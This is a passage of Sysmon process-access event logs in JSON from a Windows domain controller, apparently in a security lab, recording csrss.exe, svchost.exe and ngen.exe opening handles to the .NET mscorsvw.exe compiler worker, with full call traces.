C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.106","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001084040C00}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7688,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.106\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001084040C00}\r\nTargetProcessId: 1292\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.106","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001084040C00}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7689,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.340\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001000090C00}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.340","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001000090C00}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7690,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.340\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001000090C00}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.340","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001000090C00}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7691,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.340\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001000090C00}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.340","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-001000090C00}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7692,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.387\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010165D0B00}\r\nTargetProcessId: 4776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.387","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010165D0B00}","TargetProcessId":"4776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7693,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.387\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010165D0B00}\r\nTargetProcessId: 4776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.387","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010165D0B00}","TargetProcessId":"4776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7694,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.403\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-0010FE0C0C00}\r\nTargetProcessId: 4776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:09.403","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1335-5F25-0000-0010FE0C0C00}","TargetProcessId":"4776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7695,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:09.434\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1335-5F25-0000-001087100C00}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 